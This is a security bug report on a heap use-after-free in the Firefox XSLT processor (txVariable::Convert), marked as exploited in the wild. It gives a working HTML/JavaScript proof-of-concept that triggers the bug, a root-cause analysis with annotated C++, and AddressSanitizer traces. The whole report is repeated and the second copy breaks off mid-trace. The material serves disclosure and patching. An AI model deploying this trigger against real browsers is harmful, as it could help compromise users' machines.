

#Summary
heap-use-after-free txMozillaXSLTProcessor.cpp:1361 in txVariable::Convert [exploited in the wild]

#Type
Render RCE

#NOTE
We have evidence that the following bug is being exploited in the wild.

#CREDIT
wang gang&liu jialei&du sihang&huang yi&yang kang of 360 ATA


#MINIPOC
```
<script>			
// Reproducer for the use-after-free analysed in the RCA section: a JS object
// handed to setParameter() re-enters the XSLT processor while it is converting
// that same parameter.
var v1 = '<?xml version="1.0" encoding="utf-8" ?><root><e></e></root>';
// The stylesheet declares parameter test00 and reads it with xsl:value-of, so
// the transform must convert the parameter's value (txVariable::Convert in the
// ASan stack below).
var v2 = '<?xml version="1.0" encoding="utf-8"?>  <xsl:stylesheet version="1.0"   xmlns:xsl="http://www.w3.org/1999/XSL/Transform"  xmlns:msxsl="urn:schemas-microsoft-com:xslt"   xmlns:exsl="http://exslt.org/common"  exclude-result-prefixes="msxsl">    <xsl:output method="xml" indent="yes"/> <xsl:param name="test00" />  <xsl:template match="/"> <xsl:value-of select="$test00" />  </xsl:template>    </xsl:stylesheet>';

var a1 = new DOMParser();
var a2 = new XSLTProcessor();
var a3 = a1.parseFromString(v2, "text/xml");
var a4 = a1.parseFromString(v1, "text/xml")
// The parameter value is an object whose Symbol.toPrimitive runs when
// JS::ToString converts it (ToStringSlow -> ToPrimitiveSlow -> js::Call in the
// "freed by" stack). At that moment the processor is mid-transform.
cb01 = {
	[Symbol.toPrimitive](hint) {
		console.log('cb01.toPrimitive')
		// Removing the parameter from inside the conversion callback runs
		// RemoveParameter -> ~txVariable, destroying the variable whose
		// Convert() is still on the stack; that is the free half of the UAF.
		a2.removeParameter(null, 'test00');
		if (hint == 'string')
			return 'xxxxx';
		return true;
	}
};
a2.importStylesheet(a3);
// Order matters: the parameter must be registered before the transform so the
// value-of instruction resolves it via txExecutionState::getVariable.
a2.setParameter(null, 'test00', cb01);
console.log('bef transformToDocument')
// The transform evaluates $test00, which triggers Convert() and the callback.
a2.transformToDocument(a4);	
</script>				
```

#RCA
1. Convert gets called by transformToDocument
2. Convert uses JS::ToString to obtain the string value, which causes user JS to be called
3. In the callback, the attacker calls removeParameter, which frees the txVariable itself and causes the UAF
```
// Excerpt from txMozillaXSLTProcessor.cpp; the function is truncated here (the
// lines that derive `cx` and `jsobj` from aValue, and the closing brace, are
// omitted). Converts a JS-valued XSLT parameter into a txAExprResult written
// through aResult.
nsresult txVariable::Convert(nsIVariant* aValue, txAExprResult** aResult) {

	JS::Rooted<JS::Value> v(cx, JS::ObjectValue(*jsobj));
	// [1] JS::ToString on an object runs script: ToPrimitive can invoke a
	// user-defined Symbol.toPrimitive (ASan "freed by" stack: ToStringSlow ->
	// ToPrimitiveSlow -> js::Call). That script can call
	// XSLTProcessor.removeParameter(), which runs ~txVariable while this
	// method is still executing. Nothing in the visible excerpt keeps the
	// variable alive across the call.
	JS::Rooted<JSString*> str(cx, JS::ToString(cx, v));		<<[1]
	NS_ENSURE_TRUE(str, NS_ERROR_FAILURE);

	nsAutoJSString value;
	NS_ENSURE_TRUE(value.init(cx, str), NS_ERROR_FAILURE);

	// ASan reports an 8-byte WRITE at line 1361, six lines after the ToString
	// call at 1355, which lines up with this store; presumably aResult points
	// into the region already released by ~txVariable -- confirm against the
	// file. Mitigation direction (review note): keep the variable alive for
	// the duration of the call into script, or copy out everything Convert
	// needs before JS::ToString so a re-entrant removeParameter cannot
	// invalidate state still in use.
	*aResult = new StringResult(value, nullptr);
	NS_ADDREF(*aResult);
```

#ASAN
=================================================================
==15704==ERROR: AddressSanitizer: heap-use-after-free on address 0x12233621cfa0 at pc 0x7ffe52dd81c0 bp 0x00cfa93f7820 sp 0x00cfa93f7868
WRITE of size 8 at 0x12233621cfa0 thread T0
    #0 0x7ffe52dd81bf in txVariable::Convert /builds/worker/checkouts/gecko/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:1361
    #1 0x7ffe52ddd5d3 in txVariable::getValue /builds/worker/checkouts/gecko/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:211
    #2 0x7ffe52d97ccf in txExecutionState::getVariable /builds/worker/checkouts/gecko/dom/xslt/xslt/txExecutionState.cpp:215
    #3 0x7ffe52d81c38 in VariableRefExpr::evaluate /builds/worker/checkouts/gecko/dom/xslt/xpath/txVariableRefExpr.cpp:35
    #4 0x7ffe52daf27c in txValueOf::execute /builds/worker/checkouts/gecko/dom/xslt/xslt/txInstructions.cpp:747
    #5 0x7ffe52e06791 in txXSLTProcessor::execute /builds/worker/checkouts/gecko/dom/xslt/xslt/txXSLTProcessor.cpp:46
    #6 0x7ffe52dd0402 in txMozillaXSLTProcessor::TransformToDoc /builds/worker/checkouts/gecko/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:654
    #7 0x7ffe52dcfb4c in txMozillaXSLTProcessor::TransformToDocument /builds/worker/checkouts/gecko/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:533
    #8 0x7ffe4f6186cd in mozilla::dom::XSLTProcessor_Binding::transformToDocument /builds/worker/workspace/obj-build/dom/bindings/XSLTProcessorBinding.cpp:208
    #9 0x7ffe5005d856 in mozilla::dom::binding_detail::GenericMethod<mozilla::dom::binding_detail::NormalThisPolicy,mozilla::dom::binding_detail::ThrowExceptions> /builds/worker/checkouts/gecko/dom/bindings/BindingUtils.cpp:3306
    #10 0x7ffe580b48a7 in js::InternalCallOrConstruct /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:512
    #11 0x7ffe5809d3f2 in Interpret /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:3309
    #12 0x7ffe58087d63 in js::RunScript /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:394
    #13 0x7ffe580ba923 in js::ExecuteKernel /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:767
    #14 0x7ffe580bae89 in js::Execute /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:799
    #15 0x7ffe582ada62 in ExecuteScript /builds/worker/checkouts/gecko/js/src/vm/CompilationAndEvaluation.cpp:515
    #16 0x7ffe582ade9a in JS_ExecuteScript /builds/worker/checkouts/gecko/js/src/vm/CompilationAndEvaluation.cpp:539
    #17 0x7ffe4d880625 in mozilla::dom::JSExecutionContext::ExecScript /builds/worker/checkouts/gecko/dom/base/JSExecutionContext.cpp:296
    #18 0x7ffe530418d7 in mozilla::dom::ScriptLoader::EvaluateScript /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:2180
    #19 0x7ffe5303f8b0 in mozilla::dom::ScriptLoader::EvaluateScriptElement /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:2048
    #20 0x7ffe530376ee in mozilla::dom::ScriptLoader::ProcessRequest /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:1704
    #21 0x7ffe5303313e in mozilla::dom::ScriptLoader::ProcessInlineScript /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:1147
    #22 0x7ffe5301e943 in mozilla::dom::ScriptLoader::ProcessScriptElement /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:858
    #23 0x7ffe5301d9d6 in mozilla::dom::ScriptElement::MaybeProcessScript /builds/worker/checkouts/gecko/dom/script/ScriptElement.cpp:118
    #24 0x7ffe4c59da53 in nsHtml5TreeOpExecutor::RunScript /builds/worker/checkouts/gecko/parser/html/nsHtml5TreeOpExecutor.cpp:897
    #25 0x7ffe4c597a46 in nsHtml5TreeOpExecutor::RunFlushLoop /builds/worker/checkouts/gecko/parser/html/nsHtml5TreeOpExecutor.cpp:690
    #26 0x7ffe4c5a5257 in nsHtml5ExecutorFlusher::Run /builds/worker/checkouts/gecko/parser/html/nsHtml5StreamParser.cpp:173
    #27 0x7ffe49f9aff6 in mozilla::SchedulerGroup::Runnable::Run /builds/worker/checkouts/gecko/xpcom/threads/SchedulerGroup.cpp:140
    #28 0x7ffe49ffe5dd in mozilla::RunnableTask::Run /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:467
    #29 0x7ffe49fb3381 in mozilla::TaskController::DoExecuteNextTaskOnlyMainThreadInternal /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:770
    #30 0x7ffe49faf8dc in mozilla::TaskController::ExecuteNextTaskOnlyMainThreadInternal /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:606
    #31 0x7ffe49fb02a4 in mozilla::TaskController::ProcessPendingMTTask /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:390
    #32 0x7ffe4a006921 in mozilla::detail::RunnableFunction<`lambda at /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:124:7'>::Run /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.h:531
    #33 0x7ffe49fde593 in nsThread::ProcessNextEvent /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:1173
    #34 0x7ffe49fef6ac in NS_ProcessNextEvent /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp:467
    #35 0x7ffe4b48986d in mozilla::ipc::MessagePump::Run /builds/worker/checkouts/gecko/ipc/glue/MessagePump.cpp:85
    #36 0x7ffe4b39a125 in MessageLoop::RunHandler /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:324
    #37 0x7ffe4b399ef5 in MessageLoop::Run /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:306
    #38 0x7ffe5354606a in nsBaseAppShell::Run /builds/worker/checkouts/gecko/widget/nsBaseAppShell.cpp:137
    #39 0x7ffe5372c29b in nsAppShell::Run /builds/worker/checkouts/gecko/widget/windows/nsAppShell.cpp:605
    #40 0x7ffe57dc68f4 in XRE_RunAppShell /builds/worker/checkouts/gecko/toolkit/xre/nsEmbedFunctions.cpp:878
    #41 0x7ffe4b39a125 in MessageLoop::RunHandler /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:324
    #42 0x7ffe4b399ef5 in MessageLoop::Run /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:306
    #43 0x7ffe57dc5e15 in XRE_InitChildProcess /builds/worker/checkouts/gecko/toolkit/xre/nsEmbedFunctions.cpp:715
    #44 0x7ff685b9208c in NS_internal_main /builds/worker/checkouts/gecko/browser/app/nsBrowserApp.cpp:327
    #45 0x7ff685b917ad in wmain /builds/worker/checkouts/gecko/toolkit/xre/nsWindowsWMain.cpp:147
    #46 0x7ff685c8e757 in __scrt_common_main_seh d:\agent\_work\1\s\src\vctools\crt\vcstartup\src\startup\exe_common.inl:288
    #47 0x7ffef2fe7033 in BaseThreadInitThunk+0x13 (C:\Windows\System32\KERNEL32.DLL+0x180017033)
    #48 0x7ffef3ce2650 in RtlUserThreadStart+0x20 (C:\Windows\SYSTEM32\ntdll.dll+0x180052650)

0x12233621cfa0 is located 16 bytes inside of 24-byte region [0x12233621cf90,0x12233621cfa8)
freed by thread T0 here:
    #0 0x7ffebc467cdb in free /builds/worker/fetches/llvm-project/compiler-rt/lib/asan/asan_malloc_win.cpp:82
    #1 0x7ffe52ddd54b in txVariable::~txVariable /builds/worker/checkouts/gecko/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:199
    #2 0x7ffe52dd4309 in txMozillaXSLTProcessor::RemoveParameter /builds/worker/checkouts/gecko/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:964
    #3 0x7ffe4f61aaa9 in mozilla::dom::XSLTProcessor_Binding::removeParameter /builds/worker/workspace/obj-build/dom/bindings/XSLTProcessorBinding.cpp:367
    #4 0x7ffe5005d856 in mozilla::dom::binding_detail::GenericMethod<mozilla::dom::binding_detail::NormalThisPolicy,mozilla::dom::binding_detail::ThrowExceptions> /builds/worker/checkouts/gecko/dom/bindings/BindingUtils.cpp:3306
    #5 0x7ffe580b48a7 in js::InternalCallOrConstruct /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:512
    #6 0x7ffe5809d3f2 in Interpret /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:3309
    #7 0x7ffe58087d63 in js::RunScript /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:394
    #8 0x7ffe580b4b13 in js::InternalCallOrConstruct /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:544
    #9 0x7ffe580b772e in js::Call /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:589
    #10 0x7ffe5841488f in js::ToPrimitiveSlow /builds/worker/checkouts/gecko/js/src/vm/JSObject.cpp:2402
    #11 0x7ffe58778172 in js::ToStringSlow<js::CanGC> /builds/worker/checkouts/gecko/js/src/vm/StringType.cpp:2185
    #12 0x7ffe52dd7593 in txVariable::Convert /builds/worker/checkouts/gecko/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:1355
    #13 0x7ffe52ddd5d3 in txVariable::getValue /builds/worker/checkouts/gecko/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:211
    #14 0x7ffe52d97ccf in txExecutionState::getVariable /builds/worker/checkouts/gecko/dom/xslt/xslt/txExecutionState.cpp:215
    #15 0x7ffe52d81c38 in VariableRefExpr::evaluate /builds/worker/checkouts/gecko/dom/xslt/xpath/txVariableRefExpr.cpp:35
    #16 0x7ffe52daf27c in txValueOf::execute /builds/worker/checkouts/gecko/dom/xslt/xslt/txInstructions.cpp:747
    #17 0x7ffe52e06791 in txXSLTProcessor::execute /builds/worker/checkouts/gecko/dom/xslt/xslt/txXSLTProcessor.cpp:46
    #18 0x7ffe52dd0402 in txMozillaXSLTProcessor::TransformToDoc /builds/worker/checkouts/gecko/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:654
    #19 0x7ffe52dcfb4c in txMozillaXSLTProcessor::TransformToDocument /builds/worker/checkouts/gecko/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:533
    #20 0x7ffe4f6186cd in mozilla::dom::XSLTProcessor_Binding::transformToDocument /builds/worker/workspace/obj-build/dom/bindings/XSLTProcessorBinding.cpp:208
    #21 0x7ffe5005d856 in mozilla::dom::binding_detail::GenericMethod<mozilla::dom::binding_detail::NormalThisPolicy,mozilla::dom::binding_detail::ThrowExceptions> /builds/worker/checkouts/gecko/dom/bindings/BindingUtils.cpp:3306
    #22 0x7ffe580b48a7 in js::InternalCallOrConstruct /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:512
    #23 0x7ffe5809d3f2 in Interpret /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:3309
    #24 0x7ffe58087d63 in js::RunScript /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:394
    #25 0x7ffe580ba923 in js::ExecuteKernel /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:767
    #26 0x7ffe580bae89 in js::Execute /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:799
    #27 0x7ffe582ada62 in ExecuteScript /builds/worker/checkouts/gecko/js/src/vm/CompilationAndEvaluation.cpp:515

previously allocated by thread T0 here:
    #0 0x7ffebc467deb in malloc /builds/worker/fetches/llvm-project/compiler-rt/lib/asan/asan_malloc_win.cpp:98
    #1 0x7ffec314134d in moz_xmalloc /builds/worker/checkouts/gecko/memory/mozalloc/mozalloc.cpp:52
    #2 0x7ffe52dd21d0 in txMozillaXSLTProcessor::SetParameter /builds/worker/checkouts/gecko/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:920
    #3 0x7ffe52dd5ce7 in txMozillaXSLTProcessor::SetParameter /builds/worker/checkouts/gecko/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:1210
    #4 0x7ffe4f61948b in mozilla::dom::XSLTProcessor_Binding::setParameter /builds/worker/workspace/obj-build/dom/bindings/XSLTProcessorBinding.cpp:263
    #5 0x7ffe5005d856 in mozilla::dom::binding_detail::GenericMethod<mozilla::dom::binding_detail::NormalThisPolicy,mozilla::dom::binding_detail::ThrowExceptions> /builds/worker/checkouts/gecko/dom/bindings/BindingUtils.cpp:3306
    #6 0x7ffe580b48a7 in js::InternalCallOrConstruct /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:512
    #7 0x7ffe5809d3f2 in Interpret /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:3309
    #8 0x7ffe58087d63 in js::RunScript /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:394
    #9 0x7ffe580ba923 in js::ExecuteKernel /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:767
    #10 0x7ffe580bae89 in js::Execute /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:799
    #11 0x7ffe582ada62 in ExecuteScript /builds/worker/checkouts/gecko/js/src/vm/CompilationAndEvaluation.cpp:515
    #12 0x7ffe582ade9a in JS_ExecuteScript /builds/worker/checkouts/gecko/js/src/vm/CompilationAndEvaluation.cpp:539
    #13 0x7ffe4d880625 in mozilla::dom::JSExecutionContext::ExecScript /builds/worker/checkouts/gecko/dom/base/JSExecutionContext.cpp:296
    #14 0x7ffe530418d7 in mozilla::dom::ScriptLoader::EvaluateScript /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:2180
    #15 0x7ffe5303f8b0 in mozilla::dom::ScriptLoader::EvaluateScriptElement /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:2048
    #16 0x7ffe530376ee in mozilla::dom::ScriptLoader::ProcessRequest /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:1704
    #17 0x7ffe5303313e in mozilla::dom::ScriptLoader::ProcessInlineScript /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:1147
    #18 0x7ffe5301e943 in mozilla::dom::ScriptLoader::ProcessScriptElement /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:858
    #19 0x7ffe5301d9d6 in mozilla::dom::ScriptElement::MaybeProcessScript /builds/worker/checkouts/gecko/dom/script/ScriptElement.cpp:118
    #20 0x7ffe4c59da53 in nsHtml5TreeOpExecutor::RunScript /builds/worker/checkouts/gecko/parser/html/nsHtml5TreeOpExecutor.cpp:897
    #21 0x7ffe4c597a46 in nsHtml5TreeOpExecutor::RunFlushLoop /builds/worker/checkouts/gecko/parser/html/nsHtml5TreeOpExecutor.cpp:690
    #22 0x7ffe4c5a5257 in nsHtml5ExecutorFlusher::Run /builds/worker/checkouts/gecko/parser/html/nsHtml5StreamParser.cpp:173
    #23 0x7ffe49f9aff6 in mozilla::SchedulerGroup::Runnable::Run /builds/worker/checkouts/gecko/xpcom/threads/SchedulerGroup.cpp:140
    #24 0x7ffe49ffe5dd in mozilla::RunnableTask::Run /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:467
    #25 0x7ffe49fb3381 in mozilla::TaskController::DoExecuteNextTaskOnlyMainThreadInternal /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:770
    #26 0x7ffe49faf8dc in mozilla::TaskController::ExecuteNextTaskOnlyMainThreadInternal /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:606
    #27 0x7ffe49fb02a4 in mozilla::TaskController::ProcessPendingMTTask /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:390

SUMMARY: AddressSanitizer: heap-use-after-free /builds/worker/checkouts/gecko/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:1361 in txVariable::Convert
Shadow bytes around the buggy address:
  0x04619cdc39a0: fd fd fa fa fd fd fd fd fa fa 00 00 00 00 fa fa
  0x04619cdc39b0: 00 00 00 00 fa fa fd fd fd fd fa fa 00 00 00 fa
  0x04619cdc39c0: fa fa 00 00 00 fa fa fa 00 00 00 00 fa fa 00 00
  0x04619cdc39d0: 00 00 fa fa 00 00 00 00 fa fa fd fd fd fd fa fa
  0x04619cdc39e0: 00 00 00 00 fa fa 00 00 00 00 fa fa 00 00 00 fa
=>0x04619cdc39f0: fa fa fd fd[fd]fa fa fa fd fd fd fd fa fa 00 00
  0x04619cdc3a00: 00 00 fa fa 00 00 00 fa fa fa 00 00 00 fa fa fa
  0x04619cdc3a10: 00 00 00 00 fa fa 00 00 00 00 fa fa fd fd fd fd
  0x04619cdc3a20: fa fa 00 00 00 00 fa fa 00 00 00 fa fa fa 00 00
  0x04619cdc3a30: 00 00 fa fa fd fd fd fa fa fa fd fd fd fd fa fa
  0x04619cdc3a40: fd fd fd fd fa fa fd fd fd fd fa fa fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==15704==ABORTING
#Summary
heap-use-after-free txMozillaXSLTProcessor.cpp:1361 in txVariable::Convert [exploited in the wild]

#Type
Render RCE

#NOTE
We have evidence that the following bug is being exploited in the wild.

#CREDIT
wang gang&liu jialei&du sihang&huang yi&yang kang of 360 ATA


#MINIPOC
```HTML
<script>			
// Reproducer for the use-after-free analysed in the RCA section: a JS object
// handed to setParameter() re-enters the XSLT processor while it is converting
// that same parameter.
var v1 = '<?xml version="1.0" encoding="utf-8" ?><root><e></e></root>';
// The stylesheet declares parameter test00 and reads it with xsl:value-of, so
// the transform must convert the parameter's value (txVariable::Convert in the
// ASan stack below).
var v2 = '<?xml version="1.0" encoding="utf-8"?>  <xsl:stylesheet version="1.0"   xmlns:xsl="http://www.w3.org/1999/XSL/Transform"  xmlns:msxsl="urn:schemas-microsoft-com:xslt"   xmlns:exsl="http://exslt.org/common"  exclude-result-prefixes="msxsl">    <xsl:output method="xml" indent="yes"/> <xsl:param name="test00" />  <xsl:template match="/"> <xsl:value-of select="$test00" />  </xsl:template>    </xsl:stylesheet>';

var a1 = new DOMParser();
var a2 = new XSLTProcessor();
var a3 = a1.parseFromString(v2, "text/xml");
var a4 = a1.parseFromString(v1, "text/xml")
// The parameter value is an object whose Symbol.toPrimitive runs when
// JS::ToString converts it (ToStringSlow -> ToPrimitiveSlow -> js::Call in the
// "freed by" stack). At that moment the processor is mid-transform.
cb01 = {
	[Symbol.toPrimitive](hint) {
		console.log('cb01.toPrimitive')
		// Removing the parameter from inside the conversion callback runs
		// RemoveParameter -> ~txVariable, destroying the variable whose
		// Convert() is still on the stack; that is the free half of the UAF.
		a2.removeParameter(null, 'test00');
		if (hint == 'string')
			return 'xxxxx';
		return true;
	}
};
a2.importStylesheet(a3);
// Order matters: the parameter must be registered before the transform so the
// value-of instruction resolves it via txExecutionState::getVariable.
a2.setParameter(null, 'test00', cb01);
console.log('bef transformToDocument')
// The transform evaluates $test00, which triggers Convert() and the callback.
a2.transformToDocument(a4);	
</script>				
```

#RCA
1. Convert gets called by transformToDocument
2. Convert uses JS::ToString to obtain the string value, which causes user JS to be called
3. In the callback, the attacker calls removeParameter, which frees the txVariable itself and causes the UAF
```C++
// Excerpt from txMozillaXSLTProcessor.cpp; the function is truncated here (the
// lines that derive `cx` and `jsobj` from aValue, and the closing brace, are
// omitted). Converts a JS-valued XSLT parameter into a txAExprResult written
// through aResult.
nsresult txVariable::Convert(nsIVariant* aValue, txAExprResult** aResult) {

	JS::Rooted<JS::Value> v(cx, JS::ObjectValue(*jsobj));
	// [1] JS::ToString on an object runs script: ToPrimitive can invoke a
	// user-defined Symbol.toPrimitive (ASan "freed by" stack: ToStringSlow ->
	// ToPrimitiveSlow -> js::Call). That script can call
	// XSLTProcessor.removeParameter(), which runs ~txVariable while this
	// method is still executing. Nothing in the visible excerpt keeps the
	// variable alive across the call.
	JS::Rooted<JSString*> str(cx, JS::ToString(cx, v));		<<[1]
	NS_ENSURE_TRUE(str, NS_ERROR_FAILURE);

	nsAutoJSString value;
	NS_ENSURE_TRUE(value.init(cx, str), NS_ERROR_FAILURE);

	// ASan reports an 8-byte WRITE at line 1361, six lines after the ToString
	// call at 1355, which lines up with this store; presumably aResult points
	// into the region already released by ~txVariable -- confirm against the
	// file. Mitigation direction (review note): keep the variable alive for
	// the duration of the call into script, or copy out everything Convert
	// needs before JS::ToString so a re-entrant removeParameter cannot
	// invalidate state still in use.
	*aResult = new StringResult(value, nullptr);
	NS_ADDREF(*aResult);
```
```
#ASAN
=================================================================
==15704==ERROR: AddressSanitizer: heap-use-after-free on address 0x12233621cfa0 at pc 0x7ffe52dd81c0 bp 0x00cfa93f7820 sp 0x00cfa93f7868
WRITE of size 8 at 0x12233621cfa0 thread T0
    #0 0x7ffe52dd81bf in txVariable::Convert /builds/worker/checkouts/gecko/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:1361
    #1 0x7ffe52ddd5d3 in txVariable::getValue /builds/worker/checkouts/gecko/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:211
    #2 0x7ffe52d97ccf in txExecutionState::getVariable /builds/worker/checkouts/gecko/dom/xslt/xslt/txExecutionState.cpp:215
    #3 0x7ffe52d81c38 in VariableRefExpr::evaluate /builds/worker/checkouts/gecko/dom/xslt/xpath/txVariableRefExpr.cpp:35
    #4 0x7ffe52daf27c in txValueOf::execute /builds/worker/checkouts/gecko/dom/xslt/xslt/txInstructions.cpp:747
    #5 0x7ffe52e06791 in txXSLTProcessor::execute /builds/worker/checkouts/gecko/dom/xslt/xslt/txXSLTProcessor.cpp:46
    #6 0x7ffe52dd0402 in txMozillaXSLTProcessor::TransformToDoc /builds/worker/checkouts/gecko/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:654
    #7 0x7ffe52dcfb4c in txMozillaXSLTProcessor::TransformToDocument /builds/worker/checkouts/gecko/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:533
    #8 0x7ffe4f6186cd in mozilla::dom::XSLTProcessor_Binding::transformToDocument /builds/worker/workspace/obj-build/dom/bindings/XSLTProcessorBinding.cpp:208
    #9 0x7ffe5005d856 in mozilla::dom::binding_detail::GenericMethod<mozilla::dom::binding_detail::NormalThisPolicy,mozilla::dom::binding_detail::ThrowExceptions> /builds/worker/checkouts/gecko/dom/bindings/BindingUtils.cpp:3306
    #10 0x7ffe580b48a7 in js::InternalCallOrConstruct /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:512
    #11 0x7ffe5809d3f2 in Interpret /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:3309
    #12 0x7ffe58087d63 in js::RunScript /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:394
    #13 0x7ffe580ba923 in js::ExecuteKernel /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:767
    #14 0x7ffe580bae89 in js::Execute /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:799
    #15 0x7ffe582ada62 in ExecuteScript /builds/worker/checkouts/gecko/js/src/vm/CompilationAndEvaluation.cpp:515
    #16 0x7ffe582ade9a in JS_ExecuteScript /builds/worker/checkouts/gecko/js/src/vm/CompilationAndEvaluation.cpp:539
    #17 0x7ffe4d880625 in mozilla::dom::JSExecutionContext::ExecScript /builds/worker/checkouts/gecko/dom/base/JSExecutionContext.cpp:296
    #18 0x7ffe530418d7 in mozilla::dom::ScriptLoader::EvaluateScript /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:2180
    #19 0x7ffe5303f8b0 in mozilla::dom::ScriptLoader::EvaluateScriptElement /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:2048
    #20 0x7ffe530376ee in mozilla::dom::ScriptLoader::ProcessRequest /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:1704
    #21 0x7ffe5303313e in mozilla::dom::ScriptLoader::ProcessInlineScript /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:1147
    #22 0x7ffe5301e943 in mozilla::dom::ScriptLoader::ProcessScriptElement /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:858
    #23 0x7ffe5301d9d6 in mozilla::dom::ScriptElement::MaybeProcessScript /builds/worker/checkouts/gecko/dom/script/ScriptElement.cpp:118
    #24 0x7ffe4c59da53 in nsHtml5TreeOpExecutor::RunScript /builds/worker/checkouts/gecko/parser/html/nsHtml5TreeOpExecutor.cpp:897
    #25 0x7ffe4c597a46 in nsHtml5TreeOpExecutor::RunFlushLoop /builds/worker/checkouts/gecko/parser/html/nsHtml5TreeOpExecutor.cpp:690
    #26 0x7ffe4c5a5257 in nsHtml5ExecutorFlusher::Run /builds/worker/checkouts/gecko/parser/html/nsHtml5StreamParser.cpp:173
    #27 0x7ffe49f9aff6 in mozilla::SchedulerGroup::Runnable::Run /builds/worker/checkouts/gecko/xpcom/threads/SchedulerGroup.cpp:140
    #28 0x7ffe49ffe5dd in mozilla::RunnableTask::Run /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:467
    #29 0x7ffe49fb3381 in mozilla::TaskController::DoExecuteNextTaskOnlyMainThreadInternal /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:770
    #30 0x7ffe49faf8dc in mozilla::TaskController::ExecuteNextTaskOnlyMainThreadInternal /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:606
    #31 0x7ffe49fb02a4 in mozilla::TaskController::ProcessPendingMTTask /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:390
    #32 0x7ffe4a006921 in mozilla::detail::RunnableFunction<`lambda at /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:124:7'>::Run /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.h:531
    #33 0x7ffe49fde593 in nsThread::ProcessNextEvent /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:1173
    #34 0x7ffe49fef6ac in NS_ProcessNextEvent /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp:467
